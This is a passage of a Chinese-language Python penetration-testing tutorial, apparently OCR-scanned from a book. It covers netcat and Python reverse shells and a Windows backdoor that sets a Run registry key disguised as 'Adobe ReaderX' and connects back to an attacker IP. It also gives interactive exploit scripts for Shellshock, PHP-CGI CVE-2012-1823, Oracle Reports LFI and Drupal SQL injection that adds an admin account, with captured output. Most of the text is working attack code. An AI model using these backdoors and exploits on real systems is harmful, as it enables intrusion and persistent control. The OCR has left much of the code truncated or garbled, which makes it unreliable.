都 是 直接 从 键盘 上 读 取 ). 


这 意味 着 有 一 些 特殊 的 命令 能 够 帮助 你 反弹 shel|, 像 我 们 最 常见 的 就 是 使 用 netcat 命 
3k Ix 3E shell: 


# 启 动 netcat 监听 器 
~$ nc -lvp 443 
listening on [any] 443 ... 


# 使 用 netcat 反 弹 '/bin/sh' 
~$ nc 127.0.0.1 443 -e /bin/sh 


现在 你 可 能 注意 到 你 看 不 到 一 些 命令 提示 ,我 们 输入 几 个 命令 试 试 : 


id 
uid-1000(kali) gid-1000(kali) groups-1000(kali) 


uname -a 
Linux kali 3.12-kalii-amd64 #1 SMP Debian 3.12.6-2kali1 (2014-01-60t 


ls 
bin 
boot 
dev 
etc 
home 
initrd.img 
lib 
lib64 
media 
mnt 
opt 
proc 
root 
run 
sbin 
selinux 
srv 
Sys 
tmp 
usr 
var 
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上 面 这 些 命令 运行 会 很 正常, 但 是 当 你 运行 一 些 需要 用 户 再 次 输入 验证 或 者 是 编辑 的 
命令 就 可 能 会 出 现 问题 , 例如 (FTP,SSH,vi 等 ), 因 为 我 们 虚拟 的 终端 它 只 有 标准 的 输 
入 输出 功能 ,不 会 再 次 返回 验证 输入 . 但 是 对 于 写 文 件 我 们 可 以 使 用 echo 命 合 来 写 入 
内 容 ,这 个 对 于 现实 是 一 点 儿 也 不 违 和 的 ， 


在 使 用 的 过 程 中 你 也 可 能 已 经 注意 到 了 , 它 并 有 任何 的 提示 性 消息 给 您 .这 是 因为 命 
兮 的 的 提示 消息 是 同 过 STDERR 画 数 来 传递 的 , 而 在 前 面 我 们 也 讨论 过 我 们 实现 的 
并 不 是 一 个 原生 终端 ,如 果 你 想 执 行 一 些 二 进 制 的 执行 文件 ,譬如 是 meterpeter 的 执行 
文件 就 可 能 会 出 现 错误 . 


对 于 已 经 安装 了 python 的 系统 ,我 们 可 以 使 用 python 提 供 的 pty 模 块 ,只 需要 一 行 脚本 
就 可 以 创建 一 个 原生 的 终端 .下 面 是 演示 代码 .执行 第 一 行 前 我 还 没有 进入 终端 . 





python -c "import pty;pty.spawn('/bin/bash')" 


kaliQkali:/$ uname -a 
uname -a 
Linux kali 3.12-kalii-amd64 #1 SMP Debian 3.12.6-2kali1 (2014-01-0t( 


kali@kali:/$ id 
id 
uid-1000(kali) gid-1000(kali) groups-1000(kali) 


kaliQkali:/$ ls 


ls 

bin dev home lib64 opt srv usr 
boot initrd.img media proc sbin sys var 
etc lib mnt root selinux tmp 


kaliQkali:/$ 
E > | 
-C 参 数 选 项 允许 我 们 直接 在 命令 终端 里 面 执 行 指定 脚本 ,上 面 那 段 脚 本 ,我 使 用 分 号 把 


两 行 代码 合并 为 了 一 行 .这 样 写 并 不 为 过 .还 有 一 点 . 就 是 双 引 号 里 面 只 能 使 用 单 引 号 
把 /bin/bash 引 起 来 ,如 果 使 用 双 引 号 就 出 出 现 语法 错误 .就 像 下 面 这 样 : 





python -c "import pty;pty.spawn("/bin/bash")" 


虽然 到 目前 为 止 写 的 虚拟 终端 并 没有 原生 终端 那样 好 ,但 是 花 点 时 间 去 折腾 然后 不 断 
的 去 完善 .相信 会 做 的 更 好 . 大 家 可 能 在 渗透 测试 的 时 候 会 发 现 有 些 时 候 系统 的 命令 
终端 是 不 允许 直接 访问 的 ,那么 这 个 时 候 用 Python 虚拟 化 一 个 终端 相信 会 让 你 眼前 一 


di 


本 节 将 带 着 大 家 利用 前 面 章节 所 学 到 的 知识 使 用 Python 和 Pylnstalle 自 己 的 exp, 在 前 
面 的 章节 , 讲 到 了 如 何 把 一 个 python 脚 本 编译 成 为 一 个 可 执行 的 PE 文件 ,现在 让 我 们 
利用 前 面 学 到 的 知识 快速 写 一 个 windows 工 具 脚本 . 


开始 编码 


大 家 其 实 会 发 现 ,很 多 恶意 中 间 件 最 想 干 的 一 件 事 情 就 是 获得 被 攻击 系统 的 持久 性 
(永久 的 潜伏 在 系统 里 面 ,永久 性 后 门 ), 像 在 windows 里 面 最 常见 的 一 种 方式 就 是 被 攻 
击 系统 的 注册 表 键 值 . 


Software\Microsoft\Windows\CurrentVersion\Run 


下 面 的 这 一 小 段 代 码 实现 的 功能 就 是 把 程序 拷贝 到 %TEMP% 目 录 下 面 并 且 修 改 了 
注册 表 , 当 用 户 登 录 到 系统 的 时 间 就 会 执行 这 个 后 门 : 


import sys, base64, os, socket, subprocess 
from _winreg import * 


def autorun(tempdir, fileName, run): 
# 复制 执行 文件 的 到 %TEMP%: 
os.system('copy %s %s'%(fileName, tempdir) ) 


# 查询 注册 表 对 应 的 键 值 是 多 少 
# 给 该 后 门 添加 自动 执行 的 权限 
key = OpenKey(HKEY LOCAL MACHINE, run) 
runkey =[] 
try: 
i=0 
while True: 
subkey = EnumValue(key, i) 
runkey.append(subkey[0]) 
i += 1 
except WindowsError: 
pass 


# 设置 键 值 : 
if 'Adobe ReaderX' not in runkey: 

try: 
key= OpenKey(HKEY. LOCAL MACHINE, run,0,KEY ALL ACCESS) 
SetValueEx(key ,'Adobe ReaderX',0, REG. SZ, r"%TEMP%\mw. e? 
key.Close() 

except WindowsError: 
pass 


现在 我 们 已 经 把 后 门 拷贝 到 了 %TEMP% 目 录 下 面 ,并 且 给 它 添 加 了 自动 执行 的 权限 ， 
下 面 是 一 个 shel, 通 过 一 个 Python 脚本 TrustedSec 来 实现 攻击 ,但 是 做 了 一 点 修 
改 ,对 传输 的 文本 做 了 一 个 base64 编 码 . 








def shell(): 
#Base64 编码 反 向 shell 
S = socket.socket(socket.AF INET, socket.SOCK STREAM) 
s.connect(('192.168.56.1', int(443))) 
s.send('[*] Connection Established!') 
while 1: 
data = s.recv(1024) 
if data == "quit": break 
proc = subprocess.Popen(data, shell=True, stdout-subproces: 
stdout value = proc.stdout.read() + proc.stderr.read() 
encoded = base64.b64encode(stdout_value) 
s.send(encoded) 
#s.send(stdout value) 
s.close() 


def main(): 
tempdir = '%TEMP%' 
fileName = sys.argv[0] 
run = "Software\Microsoft\Windows\CurrentVersion\Run" 
autorun(tempdir, fileName, run) 
shell() 


if | name == "main ": 
main() 


AICA B 


简单 的 解释 这 个 程序 : 当 这 个 程序 执行 的 时 候 会 与 攻击 者 的 电脑 建立 一 个 连接 ,但 是 
脚本 中 的 连接 是 一 个 固定 IP 这 里 可 以 修改 为 一 个 域名 或 者 是 Amazon cloud 的 服务 
地 址 ,从 下 图 可 以 看 出 攻击 者 与 受害 者 建立 一 个 网 络 连接 ,你 也 可 以 注意 到 两 者 之 间 
被 base64 编 码 后 的 数据 流量 包 


其 
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下 面 是 完整 代码 : 


import sys, base64, os, socket, subprocess 
from _winreg import * 


def autorun(tempdir, fileName, run): 
# Copy executable to %TEMP%: 
os.system('copy %s %s'%(fileName, tempdir)) 


# Queries Windows registry for the autorun key value 
# Stores the key values in runkey array 
key = OpenKey(HKEY. LOCAL MACHINE, run) 
runkey -[] 
try: 
i-0 
while True: 
subkey - EnumValue(key, i) 
runkey.append(subkey[0]) 
i += 1 
except WindowsError: 
pass 


# If the autorun key "Adobe ReaderX" isn't set this will set the ke 
if 'Adobe ReaderX' not in runkey: 

try: 
key= OpenKey(HKEY. LOCAL MACHINE, run,0,KEY ALL ACCESS) 
SetValueEx(key ,'Adobe ReaderX',0,REG. SZ, r"%TEMP%\mw. e? 
key.Close() 

except WindowsError: 
pass 


def shell(): 

#Base64 encoded reverse shell 
S = socket.socket(socket.AF_INET, socket.SOCK STREAM) 
s.connect(('192.168.56.1', int(443))) 
s.send('[*] Connection Established!') 


while 1: 
data - s.recv(1024) 
if data -- "quit": break 


proc - subprocess.Popen(data, shell-True, stdout-subproces: 
stdout value = proc.stdout.read() + proc.stderr.read() 
encoded - base64.b64encode(stdout value) 
s.send(encoded) 
#s.send(stdout value) 

s.close() 


def main(): 
tempdir = '%TEMP%' 
fileName = sys.argv[0] 
run = "Software\Microsoft\Windows\CurrentVersion\Run" 
autorun(tempdir, fileName, run) 
shell() 


if | name == " main_": 


main() 








Fix Python E A Poch x JE 8$ BATES (Aviva), PIA nR E THLS 
情 . 这 个 Poc 执 行 后 就 和 系统 的 命令 终端 一 样 ,不 过 这 个 Poc 它 的 目的 却 与 系统 的 不 
同 .这 个 Poc 会 修改 浏览 器 的 User-Agent 信息 ,然后 不 停 的 向 攻击 主机 发 送 一 个 恶意 
的 指 邻 (这 里 是 执行 某 个 特定 的 命令 )， 


下 面 这 段 代 码 封装 了 一 个 无 限 循环 ,通过 raw_input 获 取 用 户 输入 的 终止 标记 ， 最 后 
提交 请 求 ,从 下 面 的 这 段 代 码 你 可 以 看 到 如 何 去 完 成 一 个 HTTP 请 求 以 及 如 何 修改 
User-Agent 的 内 容 : 


#!/usr/bin/python 
import sys, urllib2 # 导 人 需要 使 用 的 模块 


if len(sys.argv) != 2: # 检查 输入 命令 的 格式 是 否 正确 "<script> <URL>" 
print "Usage: "+sys.argv[0]+" <URL>" 
sys.exit(0) 


URL=sys.argv[1] # 把 测试 的 URL 输 出 显示 出 来 

print "[+] Attempting Shell Shock - Make sure to type full path" 

while True: 4 通过 raw_input 来 获取 用 户 输入 的 值 , 如 果 是 "~$" 就 停止 执行 
command=raw_input("~$ ") 
opener-urllib2.build opener() # 修改 默认 的 请 求 头 部 , 把 修改 后 的 U 
opener.addheaders-[('User-agent', '() { foo;}; echo Content-Type 
try: 4 使 用 Try/Except 进行 错误 义理 

response=opener .open(URL) # 提 交 请 求 并 且 显 示 响 应 结果 


for line in response.readlines(): 
print line.strip() 
except Exception as e: print e 





下 面 的 图 片 是 这 个 脚本 执行 后 的 截图 ,正在 测试 ip 地 址 为 http:/192.168.56.101 的 系 
统 ,你 可 以 很 清晰 的 看 到 执行 之 后 会 生成 一 个 和 真实 命令 终端 几乎 是 一 样 的 . 大 家 
其 实 可 以 看 到 这 个 脚本 只 是 对 测试 系统 发 送 了 一 个 HTTP 请 求 .其 他 的 什么 也 没有 
做 .不 过 最 后 一 张 图 展示 了 具体 的 细节 部 分 : 


root@kali:~# ./shell shocker.py http://192.168.56.101/cgi-bin/status 
[+] Attempting Shell Shock 

~$ id 

uid=1000(pentesterlab) gid=50(staff) groups-50(staff),100(pentesterlab) 
-$ uname -a 


L Y vulnerable 3.14.1-pentesterlab £1 SMP Sun Jul 6 09:16:00 EST 2014 i686 GNU/Linux 
-$ 





root@kali: ~ 


File Edit View Search Terminal Help 
2014-10-04 19:22:04.420190 IP 192.168.56.102.54294 > 192.168.56.101.80: Flags [P.], seq 2428735603:2428735785, ack 1164784531 
p,TS val 2 
.... Oem. 

..(.GET /cgi-bin 

pt-Encoding: identity 

: 192.168.56.101 

i close 
(O ( foo;}; echo Content-Type: text/plain ; echo ; /bin/bash; "id" 


2014-10-04 19:22:17.612640 IP 192.168.56.102.54295 » 192.168.56.101.80: Flags [P.], seq 3536826831:3536827019, ack 3535466442 
p,TS val 2057780 32959], length 188 


Host: 
Connection: close 
User-Agent: () { foo;}; echo Content-Type: text/plain ; echo ; /bin/bash -c "uname -a" 


root@kali:~# ./shell shocker.py http://192.168.56.101/cgi-bin/status 
[+] Attempting Shell Shock 

~$ id 

uid=1000(pentesterlab) gid=50(staff) groups-50(staff),100(pentesterlab) 


L in vulnerable 3.14.1-pentesterlab £1 SMP Sun Jul 6 09:16:00 EST 2014 i686 GNU/Linux 
-$ 





root@kali: * 


File Edit View Search Terminal Help 
2014-10-04 19:22:04.420190 IP 192.168.56.102.54294 > 192.168.56.101.80: Flags [P.], seq 2428735603:2428735785, ack 1164784531 
p,TS val 2054482 ecr 31640], length 182 
E...."@.@.-...8f..8e...P...SsEm3 
..YR..(.GET /cgi-bin/status HTTP/1.1 
Accept-Encoding: identity 
: 192.168.56.101 
Connectio close 
User-Agent: () { foo;); echo Content-Type: text/plain ; echo ; /bin/bash; -c/ "id" 


2014-10-04 19:22:17.612640 IP 192.168.56.102.54295 » 192.168.56.101.80: Flags [P.], seq 3536826831:3536827019, ack 3535466442 
p,TS val 205778 32959], length 188 

Er A AA 3 

..f4....GET / 

Accept -Encoding 

Host: 192.168. 

Connection: close 

User-Agent: () { foo;}; echo Content-Type: text/plain ; echo ; /bin/bash -c "uname -a" 





CVE-2012-1823 


ix "^PoCiR T CVE-2012-1823 — PHP-CGI 的 远程 代码 执行 漏洞 的 利用 ,下 面 这 个 
PoC 的 代码 是 通过 一 is ee iQ Dur 并 且 修 改 HttP 
Lo. Post 提 交 请 求 。 这 个 代码 的 原理 也 可 以 用 于 其 他 的 示例 。 这 段 代 码 演示 了 
如 何 通 ae eee MESES. AX: 


#!/usr/bin/python 
import sys, urllib2 # 导 入 需要 的 模块 


if len(sys.argv) != 2: # 检查 输入 的 格式 是 否 正 确 "<script> <URL>" 
print "Usage: "+sys.argv[0]+" <URL>" 
sys.exit(0) 


URL-sys.argv[1] # 输出 测试 的 ur1 链 接 "[+] Attempting CVE-2012-1 
while True: 4 循环 开始 时 先 输出 "~$ " 然后 通过 "raw_input" 获 取 要 执 和 
command-raw input("-$ ") 
Host = URL.split('/')[2] # 从 URL 解 析 主 机 名 : 'http://<host>/' : 
headers = ( # 定义 响应 头 部 


'Host': Host, 
'User-Agent': 'Mozilla', 


'Connection': 'keep-alive'} 
data = "<?php system('"+command+"');die(); ?»" # PHP 运行 的 | 
req = urllib2.Request(URL+"?-d+allow_url_include%3d1+-d+auto_prey 
try: # 使 用 Try/Except 人 处 理 响 应 信息 

response = urllib2.urlopen(req) # 发 起 请 求 


for line in response.readlines(): 
print line.strip() 
except Exception as e: print e 





:~# python cv 1823.p 
[*] Attempting CVE-2012-1823 - PH 


gid=33(www-data) groups=33(www-data) 


avicon.ico 
index.php 
patch.css 
$ uname -a 
x debian 2.6. -amd64 #1 SMP Thu Mar 22 17: 


root@kali: ~ 


File Edit View Search Terminal Help 
nput HTTP/1.1 
cept -Encoding: 
ntent -Length: 
Host : 


10:22:41.741011 IP 192.168.56.102.57100 > 192.168.56.101.80:-Ftägs TP seq 1818396492 :1818396763, ack 1567929438, win 
], length 271 


/ Plb.L]t.^.. Posters 
: POST /?-d+allow_url_include%3d1+-d+auto_prepend_file%3dphp: nput HTTP/1.1 
pt -Encodin 


applicatio -www- form-urlencoded 
clos 
Mozilla 


<?php system('uname -a');die(); ?> 








CVE-2012-3152 


这 一 小 段 代 码 是 演示 的 CVE-2012-3152 Oracle 本 地 文件 包含 的 漏洞 利用 PoC ,与 前 
一 个 PoC 示 例 有 点 类 似 ， 也 是 通过 循环 可 以 无 限 输入 需要 访问 文件 目录 。 对 于 下 面 
这 一 段 脚 本 无 前 面 有 点 不 同 。 增 加 了 一 点 交互 性 的 东西 。 通 过 termcolor 模 块 来 实 

FL: 


#!/usr/bin/python 
import sys, urllib2 # 导 和 人 需要 的 包 
from termcolor import colored + 这 里 需要 下 载 "termcolor" 模 块 


if len(sys.argv) != 2: # 检查 输入 的 格式 是 否 正确 "<script> <URL>" 
print "Usage: "+sys.argv[0]+" <URL>" 
sys.exit(0) 


URL-sys.argv [1] # 输出 测试 的 URL 

print "[+] Attempting CVE-2012-3152 - Oracle Reports LFI" 

while True: # ”循环 开始 时 先 输 出 "~$ " 然后 通过 "raw_input" 获 取 要 执 
resource-raw input(colored("-$ ", "red")) 
req = '/reports/rwservlet?report=test.rdf+desformat=html+destype: 
try: # 使 用 Try/Except 处 理 响应 信息 


response-urllib2.urlopen(URL-*req) 
# 发 起 请 求 并 且 显 示 响 应 内 容 
for line in response.readlines(): 
print line.strip() 
except Exception as e: print e 





root@kali:-# python cve-2012-3152.py http://192.168.56.101/ 
[+] Attempting CVE-2012-3152 - ORACLE Reports LFI 


initrd.img 
lib 
lib64 
live 
media 
mnt 

opt 
proc 
root 
sbin 
selinux 
srv 

sys 

tmp 

usr 

var 


> ¿Na 
backups 
cache 





CVE-2014-3704 


Drupal 在 2014 年 10 月 15 日 宣布 修复 了 一 外 SQL 注入 漏洞 。 漏 洞 的 具体 分 析 可 以 查看 
这 里 .下 面 这 段 代 码 是 通过 Python 编写 的 一 段 代 码 来 实现 一 个 SQL 注入 的 功能 ,这 个 
脚本 正确 执行 之 后 会 添加 一 个 新 的 管理 员 用 户 : 


脚本 调用 语法 ,需要 你 输入 你 要 创建 的 帐户 名 和 密码 : 
-$ python cve-2014-3704.py «URL» 
[*] Attempting CVE-2014-3704 Drupal 7.x SQLi 


Username to add: admin user 
Account created with user: admin user and password: password 


代码 示例 : 


#!/usr/bin/python 
import sys, urllib2 # 导入 需要 的 模块 


if len(sys.argv) != 2: # 检查 输入 的 格式 是 否 正确 "<script> <URL>" 

print "Usage: "+sys.argv[0]+" [URL]" 

sys.exit(0) 

URL=sys.argv[1] # 输出 测试 的 URL 

print "[+] Attempting CVE-2014-3704 Drupal 7.x SQLi" 
user=raw_input("Username to add: ") # 获取 输入 的 username 和 password 
Host = URL.split('/')[2] # 从 URL 解 析 主 机 名 : 'http://«host»/' Hz 
headers = { # 定义 响应 头 部 


'Host': Host, 
'User-Agent': 'Mozilla', 


'Connection': 'keep-alive'} 
# 提 交 的 格式 化 后 的 SQL : 


# insert into users (uid, name, pass, mail, status) select max(uid: 


data = "name%5b0%20%3binsert%20into%20user s9?6209628u 1.0962 c?62 0 n ame 962 C96; 
req = urllib2.Request(URL+"?q=node&destination=node", data, header: 


try: + 使 用 Try/Except 处 理 响应 信息 
response = urllib2.urlopen(req) # 发 起 请 求 


print "Account created with user: "+user+" and password: password' 
except Exception as e: print e 


«| m 






E 


